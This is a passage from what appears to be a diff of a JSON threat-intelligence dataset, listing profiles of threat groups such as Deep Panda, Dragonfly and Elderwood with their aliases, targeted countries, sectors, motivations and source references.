2021](https://app.tidalcyber.com/references/d74f2c25-cd53-4587-b087-7ba0b8427dc4)]", + "meta": { + "group_attack_id": "G0142", + "observed_countries": [ + "PK" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Government" + ] + }, + "related": [ + { + "dest-uuid": "f223d10c-171d-4aa7-ab2c-7ff2acaf88f1", + "type": "similar" + } + ], + "uuid": "d0f29889-7a9c-44d8-abdc-480b371f7b2b", + "value": "Confucius" + }, + { + "description": "[CopyKittens](https://app.tidalcyber.com/groups/6a8f5eca-8ecc-4bff-9c5f-5380e044ed5b) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.[[ClearSky CopyKittens March 2017](https://app.tidalcyber.com/references/f5a42615-0e4e-4d43-937d-05d2efe636cf)][[ClearSky Wilted Tulip July 2017](https://app.tidalcyber.com/references/50233005-8dc4-4e91-9477-df574271df40)][[CopyKittens Nov 2015](https://app.tidalcyber.com/references/04e3ce40-5487-4931-98db-f55da83f412e)]", + "meta": { + "country": "IR", + "group_attack_id": "G0052", + "observed_countries": [ + "DE", + "IL", + "JO", + "SA", + "TR", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Education", + "Government", + "Technology" + ] + }, + "related": [ + { + "dest-uuid": "8cca9a1d-66e4-4bc4-ad49-95f759f4c1ae", + "type": "similar" + } + ], + "uuid": "6a8f5eca-8ecc-4bff-9c5f-5380e044ed5b", + "value": "CopyKittens" + }, + { + "description": "[CURIUM](https://app.tidalcyber.com/groups/ab15a328-c41e-5701-993f-3cab29ac4544) is an Iranian threat group first reported in November 2021 that has invested in building a relationship with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note [CURIUM](https://app.tidalcyber.com/groups/ab15a328-c41e-5701-993f-3cab29ac4544) has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.[[Microsoft Iranian Threat Actor Trends November 2021](https://app.tidalcyber.com/references/78d39ee7-1cd5-5cb8-844a-1c3649e367a1)]", + "meta": { + "group_attack_id": "G1012", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [], + "uuid": "ab15a328-c41e-5701-993f-3cab29ac4544", + "value": "CURIUM" + }, + { + "description": "CyberAv3ngers is a cyber actor group that has claimed responsibility for numerous disruption-focused attacks against critical infrastructure organizations, including an oil refinery and electric utility in Israel and water/wastewater utilities in the United States. According to a joint advisory released by U.S. & Israeli cybersecurity authorities in December 2023, CyberAv3ngers (aka Cyber Av3ngers or Cyber Avengers) is a “cyber persona” of advanced persistent threat actors affiliated with the Iranian Islamic Revolutionary Guard Corps (IRGC). The advisory detailed how suspected CyberAv3ngers actors compromised programmable logic controller (PLC) devices that were exposed to the internet and used the vendor's default passwords and ports, leaving defacement images and possibly rendering the devices inoperable. The defacement messages suggested that the group or affiliates might carry out attacks against other technological equipment produced in or associated with Israel.[[U.S. CISA IRGC-Affiliated PLC Activity December 2023](/references/51a18523-5276-4a67-8644-2bc6997d043c)]", + "meta": { + "country": "IR", + "group_attack_id": "G5016", + "observed_countries": [ + "IL", + "US" + ], + "observed_motivations": [ + "Destruction" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "841ce707-a678-4bcf-86ff-7feeacd37e55", + "15787198-6c8b-4f79-bf50-258d55072fee" + ], + "target_categories": [ + "Energy", + "Utilities" + ] + }, + "related": [], + "uuid": "44a9c8ac-c287-45d2-9ebc-2c8a7d0a1f57", + "value": "CyberAv3ngers" + }, + { + "description": "Daixin Team is a ransomware- and data extortion-focused threat group first observed in mid-2022. Daixin Team is known to publicly extort its victims to pressure them into paying a ransom. It has used ransomware (believed to be based on the leaked source code for Babuk Locker) to encrypt victim data and has also exfiltrated sensitive data from victim environments and threatened to publicly leak that data.\n\nMany of Daixin Team’s victims belong to critical infrastructure sectors, especially the Healthcare and Public Health (“HPH”) sector. An October 2022 joint Cybersecurity Advisory noted Daixin Team attacks on multiple U.S. HPH organizations.[[U.S. CISA Daixin Team October 2022](/references/cbf5ecfb-de79-41cc-8250-01790ff6e89b)] Alleged victims referenced on the threat group’s extortion website belong to the healthcare, utilities, transportation (airline), automobile manufacturing, information technology, retail, and media sectors in the United States, Europe, and Asia.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]", + "meta": { + "group_attack_id": "G5015", + "observed_countries": [ + "CA", + "DE", + "ID", + "MY", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "a2e000da-8181-4327-bacd-32013dbd3654", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Aerospace", + "Healthcare", + "Manufacturing", + "Media", + "Retail", + "Technology", + "Transportation", + "Utilities" + ] + }, + "related": [], + "uuid": "07bdadce-905e-4337-898a-13e88cfb5a61", + "value": "Daixin Team" + }, + { + "description": "[Dark Caracal](https://app.tidalcyber.com/groups/7ad94dbf-9909-42dd-8b62-a435481bdb14) is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. [[Lookout Dark Caracal Jan 2018](https://app.tidalcyber.com/references/c558f5db-a426-4041-b883-995ec56e7155)]", + "meta": { + "country": "LB", + "group_attack_id": "G0070", + "observed_countries": [ + "CN", + "FR", + "DE", + "IN", + "IT", + "JO", + "KR", + "LB", + "NP", + "NL", + "PK", + "PH", + "QA", + "RU", + "SA", + "CH", + "SY", + "TH", + "US", + "VE", + "VN" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "3d449c83-4426-431a-b06a-cb4f8a0fca94", + "type": "similar" + } + ], + "uuid": "7ad94dbf-9909-42dd-8b62-a435481bdb14", + "value": "Dark Caracal" + }, + { + "description": "[[Microsoft Digital Defense FY20 Sept 2020](https://app.tidalcyber.com/references/cdf74af5-ed71-4dfd-bc49-0ccfa40b65ea)][[Microsoft DUBNIUM June 2016](https://app.tidalcyber.com/references/ae28afad-e2d6-4c3c-a309-ee7c44a3e586)][[Microsoft DUBNIUM Flash June 2016](https://app.tidalcyber.com/references/999a471e-6373-463b-a77b-d3020b4a8702)][[Microsoft DUBNIUM July 2016](https://app.tidalcyber.com/references/e1bd8fb3-e0b4-4659-85a1-d37e1c3d167f)]", + "meta": { + "id": "ecad4acb-5585-4ff1-9ada-3c187672f17b" + }, + "related": [ + { + "dest-uuid": "efa1d922-8f48-43a6-89fe-237e1f3812c8", + "type": "similar" + } + ], + "uuid": "c110892f-9eae-4ffe-bf16-55437d814f3a", + "value": "DUBNIUM" + }, + { + "description": "[Darkhotel](https://app.tidalcyber.com/groups/efa1d922-8f48-43a6-89fe-237e1f3812c8) is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group's name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. [Darkhotel](https://app.tidalcyber.com/groups/efa1d922-8f48-43a6-89fe-237e1f3812c8) has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.[[Kaspersky Darkhotel](https://app.tidalcyber.com/references/3247c03a-a57c-4945-9b85-72a70719e1cd)][[Securelist Darkhotel Aug 2015](https://app.tidalcyber.com/references/5a45be49-f5f1-4d5b-b7da-0a2f38194ec1)][[Microsoft Digital Defense FY20 Sept 2020](https://app.tidalcyber.com/references/cdf74af5-ed71-4dfd-bc49-0ccfa40b65ea)]", + "meta": { + "group_attack_id": "G0012", + "observed_countries": [ + "BD", + "CN", + "DE", + "HK", + "IN", + "ID", + "IE", + "JP", + "KP", + "KR", + "MZ", + "RU", + "TW", + "TH", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Government", + "Healthcare", + "NGOs", + "Non Profit" + ] + }, + "related": [ + { + "dest-uuid": "b8c8b96d-61e6-47b1-8e38-fd8ad5d9854d", + "type": "similar" + }, + { + "dest-uuid": "c110892f-9eae-4ffe-bf16-55437d814f3a", + "type": "similar" + } + ], + "uuid": "efa1d922-8f48-43a6-89fe-237e1f3812c8", + "value": "Darkhotel" + }, + { + "description": "[DarkHydrus](https://app.tidalcyber.com/groups/f2b31240-0b4a-4fa4-82a4-6bb00e146e75) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. [[Unit 42 DarkHydrus July 2018](https://app.tidalcyber.com/references/800279cf-e6f8-4721-818f-46e35ec7892a)] [[Unit 42 Playbook Dec 2017](https://app.tidalcyber.com/references/9923f9ff-a7b8-4058-8213-3c83c54c10a6)]", + "meta": { + "group_attack_id": "G0079", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Education", + "Government" + ] + }, + "related": [ + { + "dest-uuid": "ce2c2dfd-2445-4fbc-a747-9e7092e383f9", + "type": "similar" + } + ], + "uuid": "f2b31240-0b4a-4fa4-82a4-6bb00e146e75", + "value": "DarkHydrus" + }, + { + "description": "[DarkVishnya](https://app.tidalcyber.com/groups/d428f9be-6faf-4d57-b677-4a927fea5f7e) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.[[Securelist DarkVishnya Dec 2018](https://app.tidalcyber.com/references/da9ac5a7-c644-45fa-ab96-30ac6bfc9f81)]", + "meta": { + "group_attack_id": "G0105", + "observed_countries": [], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Banks", + "Financial Services" + ] + }, + "related": [], + "uuid": "d428f9be-6faf-4d57-b677-4a927fea5f7e", + "value": "DarkVishnya" + }, + { + "description": "[[RSA Shell Crew](https://app.tidalcyber.com/references/6872a6d3-c4ab-40cf-82b7-5c5c8e077189)]", + "meta": { + "id": "62b1680d-0ef6-474c-be65-6297564095d2" + }, + "related": [ + { + "dest-uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "type": "similar" + } + ], + "uuid": "cf629343-dce6-40db-b07e-e9667c7fe3a1", + "value": "WebMasters" + }, + { + "description": "[[RSA Shell Crew](https://app.tidalcyber.com/references/6872a6d3-c4ab-40cf-82b7-5c5c8e077189)]", + "meta": { + "id": "37fb329c-eda8-4f9e-9bbe-89eab6780749" + }, + "related": [ + { + "dest-uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "type": "similar" + } + ], + "uuid": "07485906-ee31-42d3-aa65-60f8c8715978", + "value": "PinkPanther" + }, + { + "description": "[[RSA Shell Crew](https://app.tidalcyber.com/references/6872a6d3-c4ab-40cf-82b7-5c5c8e077189)]", + "meta": { + "id": "7417fef0-7078-4023-aba0-d60274f30c80" + }, + "related": [ + { + "dest-uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "type": "similar" + } + ], + "uuid": "d2cec0e9-74c2-4095-a6d5-9996d8ad24a0", + "value": "Shell Crew" + }, + { + "description": "[[RSA Shell Crew](https://app.tidalcyber.com/references/6872a6d3-c4ab-40cf-82b7-5c5c8e077189)]", + "meta": { + "id": "47bbdec2-9f63-4388-a4cb-2f1124ecb3b4" + }, + "related": [ + { + "dest-uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "type": "similar" + } + ], + "uuid": "b7f392bf-d2bb-4074-bcfd-68a459d04a7a", + "value": "KungFu Kittens" + }, + { + "description": "[[Symantec Black Vine](https://app.tidalcyber.com/references/0b7745ce-04c0-41d9-a440-df9084a45d09)]", + "meta": { + "id": "a3a4a987-f3b4-413b-a51e-75e7cb66f716" + }, + "related": [ + { + "dest-uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "type": "similar" + } + ], + "uuid": "55740e18-3c5e-4481-95ec-e2cc8810d3ee", + "value": "Black Vine" + }, + { + "description": "[Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. [[Alperovitch 2014](https://app.tidalcyber.com/references/72e19be9-35dd-4199-bc07-bd9d0c664df6)] The intrusion into healthcare company Anthem has been attributed to [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b). [[ThreatConnect Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)] This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. [[RSA Shell Crew](https://app.tidalcyber.com/references/6872a6d3-c4ab-40cf-82b7-5c5c8e077189)] [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. [[Symantec Black Vine](https://app.tidalcyber.com/references/0b7745ce-04c0-41d9-a440-df9084a45d09)] Some analysts track [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) and [APT19](https://app.tidalcyber.com/groups/713e2963-fbf4-406f-a8cf-6a4489d90439) as the same group, but it is unclear from open source information if the groups are the same. [[ICIT China's Espionage Jul 2016](https://app.tidalcyber.com/references/1a824860-6978-454d-963a-a56414a4312b)]", + "meta": { + "country": "CN", + "group_attack_id": "G0009", + "observed_countries": [ + "AU", + "CA", + "CN", + "DK", + "IN", + "IT", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Aerospace", + "Agriculture", + "Defense", + "Energy", + "Financial Services", + "Government", + "Healthcare", + "Technology", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "066d25c1-71bd-4bd4-8ca7-edbba00063f4", + "type": "similar" + }, + { + "dest-uuid": "cf629343-dce6-40db-b07e-e9667c7fe3a1", + "type": "similar" + }, + { + "dest-uuid": "07485906-ee31-42d3-aa65-60f8c8715978", + "type": "similar" + }, + { + "dest-uuid": "d2cec0e9-74c2-4095-a6d5-9996d8ad24a0", + "type": "similar" + }, + { + "dest-uuid": "b7f392bf-d2bb-4074-bcfd-68a459d04a7a", + "type": "similar" + }, + { + "dest-uuid": "55740e18-3c5e-4481-95ec-e2cc8810d3ee", + "type": "similar" + } + ], + "uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "value": "Deep Panda" + }, + { + "description": "[[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)][[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)][[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]", + "meta": { + "id": "606860a6-d7f2-44ec-b728-5bf509e302db" + }, + "related": [ + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "similar" + } + ], + "uuid": "3209f44c-6706-4886-aee8-91f2ab14b10d", + "value": "Berserk Bear" + }, + { + "description": "[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)][[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)][[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)][[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]", + "meta": { + "id": "3d9d0d2d-ee9d-4367-bdf2-d690574f024d" + }, + "related": [ + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "similar" + } + ], + "uuid": "8e8f69f2-0bc1-4090-965b-1ee0e1e3cca9", + "value": "Crouching Yeti" + }, + { + "description": "[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)][[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)][[Secureworks MCMD July 2019](https://app.tidalcyber.com/references/f7364cfc-5a3b-4538-80d0-cae65f3c6592)][[Secureworks Karagany July 2019](https://app.tidalcyber.com/references/61c05edf-24aa-4399-8cdf-01d27f6595a1)][[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)][[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)][[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]", + "meta": { + "id": "e668617b-973b-4869-ad59-f34975d77cfe" + }, + "related": [ + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "similar" + } + ], + "uuid": "acc95a06-1553-4f73-a582-f40dc1187b58", + "value": "Energetic Bear" + }, + { + "description": "[[Mandiant Ukraine Cyber Threats January 2022](https://app.tidalcyber.com/references/6f53117f-2e94-4981-be61-c3da4b783ce2)][[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]", + "meta": { + "id": "949d3580-ee7a-4867-8875-323a417e689c" + }, + "related": [ + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "similar" + } + ], + "uuid": "2e1aa161-b0c0-431a-b974-735bb781c05a", + "value": "TEMP.Isotope" + }, + { + "description": "[[Dragos DYMALLOY ](https://app.tidalcyber.com/references/d2785c6e-e0d1-4e90-a2d5-2c302176d5d3)][[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]", + "meta": { + "id": "b59b1051-2d8d-4b44-8b89-36fce85042cd" + }, + "related": [ + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "similar" + } + ], + "uuid": "a9bba2d1-7fc8-43a0-8442-a12cde99329e", + "value": "DYMALLOY" + }, + { + "description": "[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)][[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]", + "meta": { + "id": "5bac4d4f-82e4-452c-9552-a65131d02d00" + }, + "related": [ + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "similar" + } + ], + "uuid": "5d23fa1e-ece1-4111-a5e3-7d9eb3a8c214", + "value": "TG-4192" + }, + { + "description": "[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)][[Secureworks MCMD July 2019](https://app.tidalcyber.com/references/f7364cfc-5a3b-4538-80d0-cae65f3c6592)][[Secureworks Karagany July 2019](https://app.tidalcyber.com/references/61c05edf-24aa-4399-8cdf-01d27f6595a1)][[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]", + "meta": { + "id": "f28310cb-19c5-41a1-8021-9bd81bc2919d" + }, + "related": [ + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "similar" + } + ], + "uuid": "8e252d57-69fb-4e48-a094-838e24fe620e", + "value": "IRON LIBERTY" + }, + { + "description": "[Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.[[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)][[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)] Active since at least 2010, [Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)][[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)][[Symantec Dragonfly Sept 2017](https://app.tidalcyber.com/references/11bbeafc-ed5d-4d2b-9795-a0a9544fb64e)][[Fortune Dragonfly 2.0 Sept 2017](https://app.tidalcyber.com/references/b56c5b41-b8e0-4fef-a6d8-183bb283dc7c)][[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)][[CISA AA20-296A Berserk Bear December 2020](https://app.tidalcyber.com/references/c7bc4b25-2043-4f43-8320-590f82d0e09a)][[Symantec Dragonfly 2.0 October 2017](https://app.tidalcyber.com/references/a0439d4a-a3ea-4be5-9a01-f223ca259681)]", + "meta": { + "country": "RU", + "group_attack_id": "G0035", + "observed_countries": [ + "CA", + "FR", + "DE", + "GR", + "IT", + "NO", + "PL", + "RO", + "RU", + "RS", + "ES", + "TR", + "UA", + "GB", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [ + "f2ae2283-f94d-4f8f-bbde-43f2bed66c55" + ], + "target_categories": [ + "Energy", + "Government", + "Travel Services" + ] + }, + "related": [ + { + "dest-uuid": "64d6559c-6d5c-4585-bbf9-c17868f763ee", + "type": "similar" + }, + { + "dest-uuid": "3209f44c-6706-4886-aee8-91f2ab14b10d", + "type": "similar" + }, + { + "dest-uuid": "8e8f69f2-0bc1-4090-965b-1ee0e1e3cca9", + "type": "similar" + }, + { + "dest-uuid": "acc95a06-1553-4f73-a582-f40dc1187b58", + "type": "similar" + }, + { + "dest-uuid": "2e1aa161-b0c0-431a-b974-735bb781c05a", + "type": "similar" + }, + { + "dest-uuid": "a9bba2d1-7fc8-43a0-8442-a12cde99329e", + "type": "similar" + }, + { + "dest-uuid": "5d23fa1e-ece1-4111-a5e3-7d9eb3a8c214", + "type": "similar" + }, + { + "dest-uuid": "8e252d57-69fb-4e48-a094-838e24fe620e", + "type": "similar" + } + ], + "uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "value": "Dragonfly" + }, + { + "description": "[DragonOK](https://app.tidalcyber.com/groups/f2c2db08-624c-46b9-b7ed-b22c21b81813) is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, [DragonOK](https://app.tidalcyber.com/groups/f2c2db08-624c-46b9-b7ed-b22c21b81813) is thought to have a direct or indirect relationship with the threat group [Moafee](https://app.tidalcyber.com/groups/4510ce41-27b9-479c-9bf3-a328b77bae29). [[Operation Quantum Entanglement](https://app.tidalcyber.com/references/c94f9652-32c3-4975-a9c0-48f93bdfe790)] It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT. [[New DragonOK](https://app.tidalcyber.com/references/82c1ed0d-a41d-4212-a3ae-a1d661bede2d)]", + "meta": { + "country": "CN", + "group_attack_id": "G0017", + "observed_countries": [ + "KH", + "JP", + "RU", + "TW" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Manufacturing", + "Technology" + ] + }, + "related": [ + { + "dest-uuid": "a9b44750-992c-4743-8922-129880d277ea", + "type": "similar" + } + ], + "uuid": "f2c2db08-624c-46b9-b7ed-b22c21b81813", + "value": "DragonOK" + }, + { + "description": "[[Recorded Future TAG-22 July 2021](https://app.tidalcyber.com/references/258433e7-f829-4365-adbb-c5690159070f)]", + "meta": { + "id": "e6b6aa2b-5da1-4cbf-9622-8d38a8b4433d" + }, + "related": [ + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "similar" + } + ], + "uuid": "f52f1ae7-3df5-479c-b487-b214c2946fe3", + "value": "TAG-22" + }, + { + "description": "[Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) operations may be financially motivated.[[TrendMicro EarthLusca 2022](https://app.tidalcyber.com/references/f6e1bffd-e35b-4eae-b9bf-c16a82bf7004)]\n\n[Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) has used malware commonly used by other Chinese threat groups, including [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) and the [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b) cluster, however security researchers assess [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e)'s techniques and infrastructure are separate.[[TrendMicro EarthLusca 2022](https://app.tidalcyber.com/references/f6e1bffd-e35b-4eae-b9bf-c16a82bf7004)]", + "meta": { + "group_attack_id": "G1006", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "f52f1ae7-3df5-479c-b487-b214c2946fe3", + "type": "similar" + } + ], + "uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "value": "Earth Lusca" + }, + { + "description": "[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)] [[CSM Elderwood Sept 2012](https://app.tidalcyber.com/references/6b79006d-f6de-489c-82fa-8c3c28d652ef)]", + "meta": { + "id": "54f3da5e-7868-4b0b-892a-86ee9356e5a5" + }, + "related": [ + { + "dest-uuid": "51146bb6-7478-44a3-8f08-19adcdceffca", + "type": "similar" + } + ], + "uuid": "512f83c6-b369-4d53-82b6-5b27f60e970e", + "value": "Elderwood Gang" + }, + { + "description": "[[CSM Elderwood Sept 2012](https://app.tidalcyber.com/references/6b79006d-f6de-489c-82fa-8c3c28d652ef)]", + "meta": { + "id": "8c302bb7-2c76-43dc-a048-7fbc713ca7e7" + }, + "related": [ + { + "dest-uuid": "51146bb6-7478-44a3-8f08-19adcdceffca", + "type": "similar" + } + ], + "uuid": "a34e5489-2c79-4363-8cbb-2073f310cadc", + "value": "Beijing Group" + }, + { + "description": "[[CSM Elderwood Sept 2012](https://app.tidalcyber.com/references/6b79006d-f6de-489c-82fa-8c3c28d652ef)]", + "meta": { + "id": "cd3eeeed-e0ef-49f7-9eb9-df6a53a43256" + }, + "related": [ + { + "dest-uuid": "51146bb6-7478-44a3-8f08-19adcdceffca", + "type": "similar" + } + ], + "uuid": "54369a73-2715-48b3-8897-26380a48683e", + "value": "Sneaky Panda" + }, + { + "description": "[Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. [[Security Affairs Elderwood Sept 2012](https://app.tidalcyber.com/references/ebfc56c5-0490-4b91-b49f-548c00a59162)] The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. [[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)] [[CSM Elderwood Sept 2012](https://app.tidalcyber.com/references/6b79006d-f6de-489c-82fa-8c3c28d652ef)]", + "meta": { + "country": "CN", + "group_attack_id": "G0066", + "observed_countries": [ + "BE", + "CN", + "DE", + "ID", + "IT", + "JP", + "NL", + "RU", + "CH", + "GB", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Human Rights", + "Manufacturing", + "NGOs", + "Technology" + ] + }, + "related": [ + { + "dest-uuid": "da754aeb-a86d-4874-b388-d1d2028a56be", + "type": "similar" + }, + { + "dest-uuid": "512f83c6-b369-4d53-82b6-5b27f60e970e", + "type": "similar" + }, + { + "dest-uuid": "a34e5489-2c79-4363-8cbb-2073f310cadc", + "type": "similar" + }, + { + "dest-uuid": "54369a73-2715-48b3-8897-26380a48683e", + "type": "similar" + } + ], + "uuid": "51146bb6-7478-44a3-8f08-19adcdceffca", + "value": "Elderwood" + }, + { + "description": "[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]", + "meta": { + "id": "d0beeeee-3a20-4b98-bc97-0df121eae455" + }, + "related": [ + { + "dest-uuid": "407274be-1820-4a84-939e-629313f4de1d", + "type": "similar" + } + ], + "uuid": "58a29d72-e635-443b-868d-5970497a02be", + "value": "Saint Bear" + }, + { + "description": "[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]", + "meta": { + "id": "89dfab4b-1037-4f17-85cb-f232291f8d6a" + }, + "related": [ + { + "dest-uuid": "407274be-1820-4a84-939e-629313f4de1d", + "type": 